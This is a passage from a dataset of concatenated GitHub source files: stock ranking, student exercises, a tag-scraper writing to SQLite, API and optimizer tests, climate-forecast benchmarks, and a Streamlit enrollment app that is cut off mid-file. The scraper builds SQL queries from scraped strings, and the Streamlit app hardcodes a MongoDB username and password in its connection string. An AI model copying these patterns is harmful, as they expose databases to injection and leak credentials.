start=1):\n s.roc_order = i\n\n # sort greenblatt\n @classmethod\n def sort_gb_eyroc(cls):\n gb_eyroc_order = []\n\n for s in cls.sector:\n s.gb_eyroc_order = s.ey_order + s.roc_order\n\n cls.sector.sort(key=lambda s: s.gb_eyroc_order)\n","repo_name":"dbolgheroni/idigger","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73839952787","text":"\"\"\"\nВариант 21.\nВ озере водится несколько видов рыб. Три рыбака поймали рыб некоторых их имеющихся\nв озере видов. Определить, рыб каких видов поймал каждый рыбак и рыб каких видов,\nимеющихся в озере, не выловил ни один из рыбаков.\nСкляров Владимир Дмитриевич..\n\"\"\"\nimport random #Импортирование библиотеки рандом\n\nfish_osero = {\"окунь\", \"карась\", \"лещ\", \"щука\", \"язь\", \"карп\", \"сом\", \"судак\", \"Ерш\", \"Плотва\", \"Амур\",\n \"Красноперка\", \"Толстолобики\", \"Берш\"} #множество в котором хранятся все виды рыб в озере.\nribak_1 = {random.choice(list(fish_osero)) for i in range(random.randint(1, len(fish_osero)))} #генератор рандомных рыб\nribak_2 = {random.choice(list(fish_osero)) for n in range(random.randint(1, len(fish_osero)))}\nribak_3 = {random.choice(list(fish_osero)) for d in range(random.randint(1, len(fish_osero)))}\none = (ribak_3 & ribak_2) & ribak_1 #Проверка какие элементы имеются во всех 3 множествах\nif one == set(): # Проверка условия если множество пустое = 0\n one = 0 # значение переменной one меняем на 0.\nthree = (((fish_osero - ribak_1) - ribak_2) - ribak_3) #Переменная ссылается на проверку, какие элементы отсутствуют\n\n'''Вывод данных.'''\nprint(f\"Все виды рыб: {fish_osero}\")\nprint(\"Виды рыб которые поймали каждые рыбаки:\", one)\nprint(\"Виды рыб которые не поймал ни 1 из рыбаков: \", three)\nprint(\"Виды рыб которые поймал Первый рыбак:\", ribak_1)\nprint(\"Виды рыб которые поймал Второй рыбак:\", ribak_2)\nprint(\"Виды рыб которые поймал Третий рыбак:\", ribak_3)\n","repo_name":"Foo0s/Proj_1sem_Sklyarov","sub_path":"PZ_10/PZ_10.py","file_name":"PZ_10.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32587145301","text":"sandwich_orders = ['pastrami','tuna','pastrami','ham and cheese','carbonara','egg','pastrami']\nfinished_sandwiches = []\n\nprint(\"The Deli has run out of pastrami.\")\n\nwhile sandwich_orders:\n\tsandwich = sandwich_orders.pop()\n\tif sandwich == 'pastrami':\n\t\tsandwich_orders.remove('pastrami')\n\telse:\n\t\tprint(f\"I made your {sandwich.title()} sandwich\")\n\t\tfinished_sandwiches.append(sandwich)\n\nprint(finished_sandwiches)","repo_name":"Rauada/python_work","sub_path":"examples/deli.py","file_name":"deli.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29034822757","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport sqlite3\n\nnowtime = datetime.now()\ndb = sqlite3.connect(f'Tags_[{nowtime.year}-{nowtime.month}-{nowtime.day}].db')\ncursor = db.cursor()\n\ntable_cr = '''\nCREATE TABLE IF NOT EXISTS Tags (\n Prefix varchar(255),\n Tag varchar(255),\n PostLength int\n)\n'''\n\ncursor.execute(table_cr)\ndb.commit()\n\nFEMALE = '♀'\nMALE = '♂'\n\nfor alphabet_num in range(ord('a'), ord('z')+1):\n api_url = f'https://hitomi.la/alltags-{chr(alphabet_num)}.html'\n print(f'SENT GET TO {api_url}')\n response = requests.get(api_url)\n soup = BeautifulSoup(response.content, 'html.parser')\n for posts in soup.find_all('ul', {'class': 'posts'}):\n for item in posts.find_all('li', recursive=False):\n tag = item.get_text()\n tag = tag.replace(\" \", \"_\")\n tag_num = tag[tag.index('(')+1:tag.index(')')]\n tag = tag[:tag.index('(')]\n prefix = \"tag\"\n if FEMALE in tag:\n prefix = \"female\"\n tag = tag[:tag.index(FEMALE)]\n elif MALE in tag:\n prefix = \"male\"\n tag = tag[:tag.index(MALE)]\n if tag[-1] == '_':\n tag = tag[:-1]\n print(f'(\"{prefix}\", \"{tag}\", {tag_num})')\n cursor.execute(f'INSERT INTO Tags VALUES (\"{prefix}\", \"{tag}\", {tag_num})')\ndb.commit()","repo_name":"sserve-kr/HitomiTagCrawler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38944234060","text":"from diary.skill import texts\n\n\nclass TestMarks:\n def test_full(self, studentDmitry, full_journal):\n text, tts = texts.marks_for_student(studentDmitry, full_journal)\n assert (\n text\n == \"Дмитрий\\nРусский язык. Изложение 2, 4\\nМатематика. Опоздание. Работа на уроке 3\\nХимия. Прогул\"\n )\n assert (\n tts\n == \"У дмитрия sil<[200]>Русский язык. Изложение 2 и 4 sil<[200]>Математика. Опоздание. Работа на уроке 3 sil<[200]>Химия. Прогул\"\n )\n\n def test_empty(self, studentDmitry):\n text, tts = texts.no_marks(studentDmitry)\n assert text == \"Дмитрий. Нет записей\"\n assert tts == \"По дмитрию нет записей в журнале\"\n\n\nclass TestHomework:\n def test_no_homework(self, studentDmitry):\n text, tts = texts.homework_for_student(studentDmitry, [])\n\n assert text == \"Дмитрий. Нет домашнего задания.\"\n assert tts.lower() == \"у дмитрия нет домашнего задания.\"\n\n def test_some_homework(self, studentDmitry):\n homework = [(\"География\", \"стр. 45\")]\n\n text, tts = texts.homework_for_student(studentDmitry, homework)\n\n assert \"Дмитрий. 1 задани��.\" in text\n assert \"у дмитрия 1 задание.\" in tts.lower()\n\n assert \"География. стр. 45\" in text\n assert \"страница 45\" in tts.lower()\n","repo_name":"KrapivinAndrey/AliceDiaryNew","sub_path":"tests/test_texts.py","file_name":"test_texts.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25778701561","text":"from unittest import TestCase\nfrom pixabay import Image, Video\nimport os\n\napi_key = os.getenv('PIXABAY_API_KEY')\nimage = Image(api_key)\nvideo = Video(api_key)\n\n\nclass TestPythonPixabay(TestCase):\n def test_custom_image_search(self):\n self.assertIn(\n \"hits\",\n image.search(q=\"water\",\n page=1,\n safesearch=\"true\",\n editors_choice=\"true\"))\n self.assertEqual(\n image.search(q=\"apple\", page=1)[\"hits\"][0][\"pageURL\"],\n \"https://pixabay.com/photos/apples-fruit-red-juicy-ripe-634572/\"\n )\n self.assertEqual(\n image.search(q=\"apple\",\n page=1,\n safesearch=\"false\",\n editors_choice=\"true\")[\"totalHits\"], 155)\n\n def test_custom_video_search(self):\n self.assertEqual(\n video.search(q=\"apple\",\n page=1,\n safesearch=\"false\",\n editors_choice=\"true\")[\"hits\"][0][\"pageURL\"],\n \"https://pixabay.com/videos/id-1019/\")\n self.assertEqual(\n video.search(q=\"apple\",\n page=1,\n safesearch=\"true\",\n editors_choice=\"true\")[\"totalHits\"], 1)\n","repo_name":"DoNnMyTh/pixabay","sub_path":"test/test_python_pixabay.py","file_name":"test_python_pixabay.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20461510377","text":"import torch\nimport numpy as np\nimport pytest\nfrom cpuinfo import get_cpu_info\nimport os\n\nimport deepspeed\nfrom deepspeed.ops.adam import FusedAdam\nfrom deepspeed.ops.op_builder import CPUAdamBuilder\n\nif not deepspeed.ops.__compatible_ops__[CPUAdamBuilder.NAME]:\n pytestmark = pytest.mark.skip(\n reason=\"cpu-adam is not compatible\")\n\nif bool(pytest.use_hpu) == True:\n from habana_frameworks.torch.utils.library_loader import load_habana_module\n\n\npytest.cpu_vendor = get_cpu_info()[\"vendor_id_raw\"].lower()\n\n\ndef check_equal(first, second, atol=1e-2, verbose=False):\n x = first.detach().numpy()\n y = second.detach().numpy()\n print(\"ATOL\", atol)\n if verbose:\n print(\"x = {}\".format(x.flatten()))\n print(\"y = {}\".format(y.flatten()))\n print('-' * 80)\n np.testing.assert_allclose(x, y, err_msg=\"param-update mismatch!\", atol=atol)\n\n\n@pytest.mark.parametrize('dtype', [torch.half, torch.float], ids=[\"fp16\", \"fp32\"])\n@pytest.mark.parametrize('model_size',\n [\n (64),\n (22),\n #(55),\n (128),\n (1024),\n (1048576),\n ]) # yapf: disable\ndef test_cpu_adam_opt(dtype, model_size):\n if (\"amd\" in pytest.cpu_vendor) and (dtype == torch.half):\n pytest.skip(\"cpu-adam with half precision not supported on AMD CPUs\")\n if dtype==torch.float16 and bool(pytest.use_hpu) == True and os.getenv(\"REPLACE_FP16\", default = None):\n dtype=torch.bfloat16\n from deepspeed.ops.adam import DeepSpeedCPUAdam\n device = 'cpu'\n rng_state = torch.get_rng_state()\n param = torch.nn.Parameter(torch.randn(model_size, device=device).to(dtype))\n torch.set_rng_state(rng_state)\n param1_data = torch.randn(model_size, device=device)\n param1 = torch.nn.Parameter(param1_data)\n torch.set_rng_state(rng_state)\n if bool(pytest.use_hpu) == True:\n param2_data = torch.randn(model_size, device=device).to(dtype).to('hpu')\n else:\n param2_data = torch.randn(model_size, device=device).to(dtype).cuda()\n param2 = torch.nn.Parameter(param2_data)\n\n optimizer1 = torch.optim.AdamW([param1])\n if pytest.use_hpu:\n from habana_frameworks.torch.hpex.optimizers import FusedAdamW\n optimizer2 = FusedAdamW([param2])\n else:\n optimizer2 = FusedAdam([param2])\n optimizer = DeepSpeedCPUAdam([param])\n\n for i in range(10):\n rng_state = torch.get_rng_state()\n param.grad = torch.randn(model_size, device=device).to(dtype)\n torch.set_rng_state(rng_state)\n param1.grad = torch.randn(model_size, device=device)\n torch.set_rng_state(rng_state)\n if bool(pytest.use_hpu) == True:\n param2.grad = torch.randn(model_size, device=device).to(dtype).to('hpu')\n else:\n param2.grad = torch.randn(model_size, device=device).to(dtype).cuda()\n\n optimizer.step()\n optimizer2.step()\n optimizer1.step()\n tolerance = param1.float().norm().detach().numpy() * 1e-2\n check_equal(param.float().norm(),\n param1.float().norm(),\n atol=tolerance,\n verbose=True)\n check_equal(param.float().norm(),\n param2.float().cpu().norm(),\n atol=tolerance,\n verbose=True)\n\n\ndef test_cpu_adam_gpu_error():\n model_size = 64\n from deepspeed.ops.adam import DeepSpeedCPUAdam\n if bool(pytest.use_hpu) == True:\n device = 'hpu:0'\n else:\n device = 'cuda:0'\n param = torch.nn.Parameter(torch.randn(model_size, device=device))\n optimizer = DeepSpeedCPUAdam([param])\n\n param.grad = torch.randn(model_size, device=device)\n with pytest.raises(AssertionError):\n optimizer.step()\n","repo_name":"mlcommons/training_results_v3.0","sub_path":"Intel-HabanaLabs/benchmarks/gpt3/deepspeed-fork/tests/unit/ops/adam/test_cpu_adam.py","file_name":"test_cpu_adam.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"4378339314","text":"with open('day12.txt') as f:\n input_data = f.read().split('\\n')\n input_data = [(i[0], int(i[1:])) for i in input_data if i != '']\n\nprint(input_data)\n\ndirections = {'N': (0, 1),\n 'S': (0, -1),\n 'E': (1, 0),\n 'W': (-1, 0),\n }\n\nrotations = {\n 'R': 1,\n 'L': -1\n }\n\nninety_degree = {'N': {'R': 'E', 'L': 'W'},\n 'S': {'R': 'W', 'L': 'E'},\n 'E': {'R': 'S', 'L': 'N'},\n 'W': {'R': 'N', 'L': 'S'},\n }\n\ndef add_on_vector(place, direction, steps):\n return (\n place[0] + (direction[0] * steps),\n place[1] + (direction[1] * steps)\n )\n\n\ndef rotate(direction, rotation_direction, rotation_degrees):\n no_rotations = int(rotation_degrees / 90)\n x, y = direction\n for i in range(no_rotations):\n x,y = (y * rotations[rotation_direction], -x * rotations[rotation_direction])\n return x,y\n\n\n# Part 1\n'''\nplace = (0,0)\ndirection = (1, 0)\n\nfor i in input_data:\n print(place, direction)\n if i[0] in ['R', 'L']:\n direction = rotate(direction, i[0], i[1])\n elif i[0] == 'F':\n place = add_on_vector(place, direction, i[1])\n elif i[0] in ['N', 'S', 'E', 'W']:\n place = add_on_vector(place, directions[i[0]], i[1])\n\nprint(place)\n'''\n\n# Part 2\n\nplace = (0,0)\nwaypoint = (10,1)\n\nfor i in input_data:\n print(place, waypoint, i)\n if i[0] in ['R', 'L']:\n waypoint = rotate(waypoint, i[0], i[1])\n elif i[0] == 'F':\n place = add_on_vector(place, waypoint, i[1])\n elif i[0] in ['N', 'S', 'E', 'W']:\n waypoint = add_on_vector(waypoint, directions[i[0]], i[1])\n\nprint(place, waypoint)\n","repo_name":"samjbasak/advent-of-code-2020","sub_path":"Day12/day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43795866885","text":"import sqlite3\nimport pandas as pd\nimport plotly.express as exp\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nfrom math import ceil\n\nfrom queries import (team_build_type_query, team_build_type_by_users_and_bots_query,\n team_build_type_by_maps_query, ship_effectivity_query)\n\ncon = sqlite3.connect(\"Dataset.db\")\n\n# Запрос о количестве участников, выбравших тот или иной тип боя\"\nquery = team_build_type_query\n\n# Получаем датафрейм и строим круговую диаграмму\ndf = pd.read_sql(query, con)\n\nfig = exp.pie(df, values=\"amount_members\", names=\"team_build_type\",\n title=\"Популярность типов боя среди игроков\",\n width=800, height=800)\nfig.update_layout(title_x=0.5, title_font=dict(size=26))\nfig.update_traces(textinfo='value+percent', textfont_size=14)\nfig.show()\n\n# Запрос о количестве участников, выбравших тот или иной тип боя сгруппированный среди реальных пользователей и ботов\"\nquery_1 = team_build_type_by_users_and_bots_query\n\n# Получаем датафрейм и строим две совмещенные круговые диаграммы\ndf_1 = pd.read_sql(query_1, con)\n\nfig = make_subplots(rows=1, cols=2, specs=[[{'type': 'domain'}, {'type': 'domain'}]])\nfig.add_trace(go.Pie(labels=df_1[\"team_build_type\"], values=df_1[df_1[\"users\"] == 1][\"amount_members\"], name=\"Users\"),\n 1, 1)\nfig.add_trace(go.Pie(labels=df_1[\"team_build_type\"], values=df_1[df_1[\"users\"] == 0][\"amount_members\"], name=\"Bots\"),\n 1, 2)\n\nfig.update_traces(hole=.3, hoverinfo=\"label+percent+name\", textinfo='value+percent', textfont_size=14)\n\nfig.update_layout(\n title_text=\"Популярность типов боя среди пользователей и ботов\",\n width=1200, height=800,\n title_x=0.5, title_font=dict(size=26),\n annotations=[dict(text='Users', x=0.19, y=0.5, font_size=22, showarrow=False),\n dict(text='Bots', x=0.8, y=0.5, font_size=22, showarrow=False)])\nfig.show()\n\n# Запрос о количестве разных типов боев, сгруппированных по типам карт\nquery_2 = team_build_type_by_maps_query\n\n# Получаем датафрейм и строим точечную диаграмму распределения количетсва разных типов боев для разных карт\ndf_2 = pd.read_sql(query_2, con)\n\nfig = exp.scatter(data_frame=df_2, x=\"map_type\", y=\"amount\", color=\"team_build_type\",\n title=\"Распределение колчества разных типов боев в зависимости от типа карты\",\n width=1200, height=700)\n\nfig.update_traces(marker_size=10)\nfig.update_layout(title_x=0.5, title_font=dict(size=26))\nfig.update_yaxes(dtick=500, title_font={'size': 16}, title_text='Amount of arenas')\nfig.update_xaxes(title_font={'size': 16}, title_text='Maps type')\n\nfig.show()\n\n# Запрос для анализа эффективности кораблей\nquery_3 = ship_effectivity_query\n\n# Получим датафрейм и добавим к нему колонку, объединяющую название корабля и страну\ndf_3 = pd.read_sql(query_3, con)\ndf_3[\"name\"] = df_3['ship_name'] + ', ' + df_3['country']\n\n# Строим горизонтальные столбчатые диаграммы c цветовой палитрой, от зеленого - лучшие показатели, до красного - худшие\nship_classes = list(df_3[\"ship_class\"].unique())\nheigths = []\nfor ship_class in ship_classes:\n data = df_3[df_3[\"ship_class\"] == ship_class]\n heigths.append(len(data) / len(df_3))\n\nparams = [\"alived\", \"winner\", \"frags\", \"positive_damage\", \"avg(exp)\", \"avg(distance)\"]\nmins = list(map(min, [df_3[param] for param in params]))\nmaxs = list(map(max, [df_3[param] for param in params]))\n\ncolumn_titles = [\"Процент выживаемости\", \"Процент побед\", \"Среднее кол-во фрагов\",\n \"Сред. положит. урон\", \"Средний опыт\", \"Средняя дистанция\"] * len(ship_classes)\n\nfig = make_subplots(rows=len(ship_classes), cols=len(params), subplot_titles=column_titles,\n row_titles=(list(ship_classes)),\n shared_yaxes=True, vertical_spacing=0.01, horizontal_spacing=0,\n row_heights=heigths)\n\nfor i, ship_class in enumerate(ship_classes, start=1):\n data = df_3[df_3[\"ship_class\"] == ship_class]\n z = len(data)\n for j, param in enumerate(params, start=1):\n fig.add_trace(go.Bar(x=data[param], y=data[\"name\"], text=data[param], marker_color=data[param],\n marker_cmin=mins[j - 1], marker_cmax=maxs[j - 1]), i, j)\n fig.update_xaxes(range=[0, ceil(maxs[j - 1])], row=i, col=j)\n\n fig.update_yaxes(nticks=z, secondary_y=True)\n\nfig.update_traces(orientation='h', texttemplate='%{x:.2f}', textfont_size=10, textposition='outside',\n marker_colorscale=[[0, 'rgb(250,5,34)'], [0.5, 'rgb(250,136,5)'], [1.0, 'rgb(5,250,29)']])\nfig.update_layout(showlegend=False, width=1200, height=4000, title=\"Оценка эффективности кораблей\",\n title_font={'size': 24}, title_x=0.5)\nfig.update_xaxes(showticklabels=False, showgrid=False)\nfig.update_annotations(font_size=12)\nfor i in fig['layout']['annotations'][:-5:-1]:\n i['font'] = dict(size=20)\n\nfig.show()\n","repo_name":"ann74/GamesDataAnalysis2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5741,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20785617709","text":"import warnings\n\nimport numpy as np\nimport xarray as xr\nfrom dask.distributed import Client\n\nfrom climpred import HindcastEnsemble, PerfectModelEnsemble, set_options\nfrom climpred.metrics import PROBABILISTIC_METRICS\nfrom climpred.tutorial import load_dataset\n\nfrom . import _skip_slow, ensure_loaded, parameterized, randn, requires_dask\n\n# only take subselection of all possible metrics\nMETRICS = [\"mse\", \"crps\"]\nREFERENCES = [\"uninitialized\", \"climatology\", \"persistence\"]\nITERATIONS = 8\n\nset_options(climpred_warnings=False)\n\n\nwarnings.filterwarnings(\"ignore\", message=\"Index.ravel returning ndarray is deprecated\")\n\n\nclass Compute:\n \"\"\"\n Benchmark time and peak memory of `PredictionEnsemble.verify` and\n `PredictionEnsemble.bootstrap`.\n \"\"\"\n\n # https://asv.readthedocs.io/en/stable/benchmarks.html\n timeout = 300.0\n repeat = 1\n number = 5\n\n def setup(self, *args, **kwargs):\n raise NotImplementedError()\n\n def get_kwargs(self, metric=None, bootstrap=False):\n \"\"\"Adjust kwargs for verify/bootstrap matching with metric.\"\"\"\n if not isinstance(\n self.PredictionEnsemble, (PerfectModelEnsemble, HindcastEnsemble)\n ):\n raise NotImplementedError()\n dim = [\"init\", \"member\"] if metric in PROBABILISTIC_METRICS else \"init\"\n if self.PredictionEnsemble.kind == \"hindcast\":\n comparison = \"m2o\" if metric in PROBABILISTIC_METRICS else \"e2o\"\n elif self.PredictionEnsemble.kind == \"perfect\":\n comparison = \"m2c\" if metric in PROBABILISTIC_METRICS else \"m2e\"\n metric_kwargs = dict(\n metric=metric,\n comparison=comparison,\n dim=dim,\n reference=self.reference,\n )\n if bootstrap:\n metric_kwargs[\"iterations\"] = self.iterations\n metric_kwargs[\"resample_dim\"] = self.resample_dim\n if self.PredictionEnsemble.kind == \"hindcast\":\n metric_kwargs[\"alignment\"] = self.alignment\n return metric_kwargs\n\n @parameterized([\"metric\"], (METRICS))\n def time_verify(self, metric):\n \"\"\"Take time for `PredictionEnsemble.verify`.\"\"\"\n ensure_loaded(\n self.PredictionEnsemble.verify(\n **self.get_kwargs(metric=metric, bootstrap=False)\n )\n )\n\n @parameterized([\"metric\"], (METRICS))\n def peakmem_verify(self, metric):\n \"\"\"Take memory peak for `PredictionEnsemble.verify`.\"\"\"\n ensure_loaded(\n self.PredictionEnsemble.verify(\n **self.get_kwargs(metric=metric, bootstrap=False)\n )\n )\n\n @parameterized([\"metric\"], (METRICS))\n def time_bootstrap(self, metric):\n \"\"\"Take time for `PredictionEnsemble.bootstrap`.\"\"\"\n ensure_loaded(\n self.PredictionEnsemble.bootstrap(\n **self.get_kwargs(metric=metric, bootstrap=True)\n )\n )\n\n @parameterized([\"metric\"], (METRICS))\n def peakmem_bootstrap(self, metric):\n \"\"\"Take memory peak for `PredictionEnsemble.bootstrap`.\"\"\"\n ensure_loaded(\n self.PredictionEnsemble.bootstrap(\n **self.get_kwargs(metric=metric, bootstrap=True)\n )\n )\n\n\nclass GenerateHindcastEnsemble(Compute):\n \"\"\"\n Generate random input data.\n \"\"\"\n\n def get_data(self, spatial_res=5):\n \"\"\"Generates initialized hindcast, uninitialized historical and observational\n data, mimicking a hindcast experiment.\"\"\"\n self.initialized = xr.Dataset()\n self.observations = xr.Dataset()\n self.uninitialized = xr.Dataset()\n\n self.nmember = 10\n self.nlead = 5\n self.nx = 360 // spatial_res\n self.ny = 360 // spatial_res\n self.iterations = ITERATIONS\n self.init_start = 1960\n self.init_end = 2000\n self.ninit = self.init_end - self.init_start\n self.client = None\n\n FRAC_NAN = 0.0\n\n inits = xr.cftime_range(\n start=str(self.init_start), end=str(self.init_end - 1), freq=\"YS\"\n )\n leads = np.arange(1, 1 + self.nlead)\n members = np.arange(1, 1 + self.nmember)\n\n lons = xr.DataArray(\n np.linspace(0.5, 359.5, self.nx),\n dims=(\"lon\",),\n attrs={\"units\": \"degrees east\", \"long_name\": \"longitude\"},\n )\n lats = xr.DataArray(\n np.linspace(-89.5, 89.5, self.ny),\n dims=(\"lat\",),\n attrs={\"units\": \"degrees north\", \"long_name\": \"latitude\"},\n )\n self.initialized[\"var\"] = xr.DataArray(\n randn(\n (self.nmember, self.ninit, self.nlead, self.nx, self.ny),\n frac_nan=FRAC_NAN,\n ),\n coords={\n \"member\": members,\n \"init\": inits,\n \"lon\": lons,\n \"lat\": lats,\n \"lead\": leads,\n },\n dims=(\"member\", \"init\", \"lead\", \"lon\", \"lat\"),\n name=\"var\",\n attrs={\"units\": \"var units\", \"description\": \"a description\"},\n ).squeeze()\n self.observations[\"var\"] = xr.DataArray(\n randn((self.ninit, self.nx, self.ny), frac_nan=FRAC_NAN),\n coords={\"lon\": lons, \"lat\": lats, \"time\": inits},\n dims=(\"time\", \"lon\", \"lat\"),\n name=\"var\",\n attrs={\"units\": \"var units\", \"description\": \"a description\"},\n ).squeeze()\n\n self.uninitialized[\"var\"] = xr.DataArray(\n randn((self.ninit, self.nx, self.ny, self.nmember), frac_nan=FRAC_NAN),\n coords={\"lon\": lons, \"lat\": lats, \"time\": inits, \"member\": members},\n dims=(\"time\", \"lon\", \"lat\", \"member\"),\n name=\"var\",\n attrs={\"units\": \"var units\", \"description\": \"a description\"},\n ).squeeze()\n\n self.initialized.attrs = {\"history\": \"created for xarray benchmarking\"}\n self.initialized.lead.attrs[\"units\"] = \"years\"\n\n self.PredictionEnsemble = (\n HindcastEnsemble(self.initialized)\n .add_uninitialized(self.uninitialized)\n .add_observations(self.observations)\n )\n\n def setup(self, *args, **kwargs):\n self.get_data()\n self.alignment = \"same_inits\"\n self.reference = None\n self.resample_dim = \"member\"\n self.iterations = ITERATIONS\n\n\nclass GeneratePerfectModelEnsemble(GenerateHindcastEnsemble):\n \"\"\"Generate `PerfectModelEnsemble` out of `HindcastEnsemble`.\"\"\"\n\n def setup(self, *args, **kwargs):\n self.get_data()\n self.PredictionEnsemble = PerfectModelEnsemble(self.initialized).add_control(\n self.observations\n )\n self.PredictionEnsemble = self.PredictionEnsemble.generate_uninitialized()\n self.reference = None\n self.resample_dim = \"member\"\n self.iterations = ITERATIONS\n\n\nclass GenerateHindcastEnsembleSmall(GenerateHindcastEnsemble):\n \"\"\"Generate single grid point `HindcastEnsemble`.\"\"\"\n\n def setup(self, *args, **kwargs):\n self.get_data(spatial_res=360)\n self.PredictionEnsemble = (\n HindcastEnsemble(self.initialized)\n .add_uninitialized(self.uninitialized)\n .add_observations(self.observations)\n )\n self.alignment = \"same_inits\"\n self.resample_dim = \"member\"\n self.reference = None\n self.iterations = ITERATIONS\n\n\nclass GenerateHindcastEnsembleSmallReferences(GenerateHindcastEnsembleSmall):\n \"\"\"Generate single grid point `HindcastEnsemble` with all references.\"\"\"\n\n def setup(self, *args, **kwargs):\n _skip_slow()\n super().setup(**kwargs)\n self.reference = REFERENCES\n self.alignment = \"maximize\"\n self.reference = None\n self.resample_dim = \"member\"\n\n\nclass GeneratePerfectModelEnsembleSmall(GeneratePerfectModelEnsemble):\n \"\"\"Generate single grid point `PerfectModelEnsemble`.\"\"\"\n\n def setup(self, *args, **kwargs):\n self.get_data(spatial_res=360)\n self.PredictionEnsemble = PerfectModelEnsemble(self.initialized).add_control(\n self.observations\n )\n self.PredictionEnsemble = self.PredictionEnsemble.generate_uninitialized()\n self.alignment = None\n self.reference = None\n self.resample_dim = \"member\"\n self.iterations = ITERATIONS\n\n\nclass GeneratePerfectModelEnsembleSmallReferences(GeneratePerfectModelEnsembleSmall):\n \"\"\"Generate single grid point `PerfectModelEnsemble` with all references.\"\"\"\n\n def setup(self, *args, **kwargs):\n _skip_slow()\n super().setup(**kwargs)\n self.reference = REFERENCES\n self.alignment = None\n self.reference = None\n self.resample_dim = \"member\"\n self.iterations = ITERATIONS\n\n\nclass GenerateHindcastEnsembleDask(GenerateHindcastEnsemble):\n def setup(self, *args, **kwargs):\n \"\"\"The same tests but on spatially chunked data.\"\"\"\n _skip_slow()\n requires_dask()\n super().setup(**kwargs)\n # chunk along a spatial dimension to enable embarrasingly parallel computation\n self.PredictionEnsemble = self.PredictionEnsemble.chunk({\"lead\": 1}).chunk(\n {\"lon\": \"auto\"}\n )\n\n\nclass GenerateHindcastEnsembleDaskDistributed(GenerateHindcastEnsembleDask):\n def setup(self, *args, **kwargs):\n \"\"\"The same tests but on spatially chunked data with dask.distributed.Client.\"\"\"\n _skip_slow()\n requires_dask()\n super().setup(**kwargs)\n self.client = Client()\n\n def cleanup(self):\n self.client.shutdown()\n\n\nclass S2S(Compute):\n \"\"\"Tutorial data from S2S project.\"\"\"\n\n number = 3\n\n def get_data(self):\n _skip_slow()\n init = load_dataset(\"ECMWF_S2S_Germany\").t2m.isel(lead=slice(None, None, 7))\n obs = load_dataset(\"Observations_Germany\").t2m\n self.PredictionEnsemble = (\n HindcastEnsemble(init).add_observations(obs).generate_uninitialized()\n )\n\n def setup(self, *args, **kwargs):\n self.get_data()\n self.alignment = \"maximize\"\n self.resample_dim = \"init\"\n self.reference = None\n self.iterations = ITERATIONS\n\n\nclass NMME(Compute):\n \"\"\"Tutorial data from NMME project.\"\"\"\n\n def get_data(self):\n init = (\n load_dataset(\"NMME_hindcast_Nino34_sst\")\n .isel(model=0)\n .sel(S=slice(\"1985\", \"2005\"))\n )\n obs = load_dataset(\"NMME_OIv2_Nino34_sst\")\n self.PredictionEnsemble = (\n HindcastEnsemble(init).add_observations(obs).generate_uninitialized()\n )\n\n def setup(self, *args, **kwargs):\n self.get_data()\n self.alignment = \"maximize\"\n self.resample_dim = \"init\"\n self.reference = None\n self.iterations = ITERATIONS\n","repo_name":"pangeo-data/climpred","sub_path":"asv_bench/benchmarks/benchmarks_PredictionEnsemble.py","file_name":"benchmarks_PredictionEnsemble.py","file_ext":"py","file_size_in_byte":10787,"program_lang":"python","lang":"en","doc_type":"code","stars":210,"dataset":"github-code","pt":"48"} +{"seq_id":"43123652023","text":"import numpy as np\nimport streamlit as st\nimport streamlit_authenticator as stauth\nimport yaml\nimport pymongo\nfrom datetime import datetime\nimport pandas as pd\n\n# Connect to the MongoDB database\nclient = pymongo.MongoClient(\"mongodb+srv://equipo3:password3@cluster0.gkaurda.mongodb.net/?retryWrites=true&w=majority\")\n\nstremlit_db = client[\"streamlitApp\"]\n\nenrolled_students = stremlit_db[\"enrolledStudents\"]\nsocial_service_db = client[\"DireccionSS\"]\nstudents = social_service_db[\"students\"]\npartner_projects = social_service_db[\"partnerProjects\"]\nprojects_collection = social_service_db[\"projects\"]\n\ndef overlap(start1, end1, start2, end2):\n return start1 <= end2 and end1 >= start2\n\nwith open('./config.yaml') as file:\n config = yaml.load(file, Loader=yaml.SafeLoader)\n\nauthenticator = stauth.Authenticate(\n config['credentials'],\n config['cookie']['name'],\n config['cookie']['key'],\n config['cookie']['expiry_days'],\n config['preauthorized']\n)\n\nname, authentication_status, username = authenticator.login('Login', 'main')\n\n\nif authentication_status:\n authenticator.logout('Logout', 'main')\n if username == \"socioformador1\":\n partner_id = \"SF246543\"\n elif username == \"socioformador2\":\n partner_id = \"SF680682\"\n\n partner_project_doc = partner_projects.find_one({\"partnerID\": partner_id})\n st.write(f'Bienvenido *{name}*')\n tab1, tab2 = st.tabs([\"Inscribir\", \"Ver Estudiantes Inscritos\"])\n with tab1:\n studentID = st.text_input('**Matrícula**')\n projects = partner_project_doc[\"projectsIDs\"]\n if studentID:\n document = students.find_one({\"studentID\": studentID})\n if document:\n name = document[\"name\"]\n major = document[\"major\"]\n hasInductionWeek = document[\"hasInductionWeek\"]\n if hasInductionWeek:\n hasIW = \"Sí\"\n else:\n hasIW = \"No\"\n st.write(\"Nombre: \", name)\n st.write(\"Carrera: \", major)\n st.write(\"Requisito Semana Inducción: \", hasIW)\n 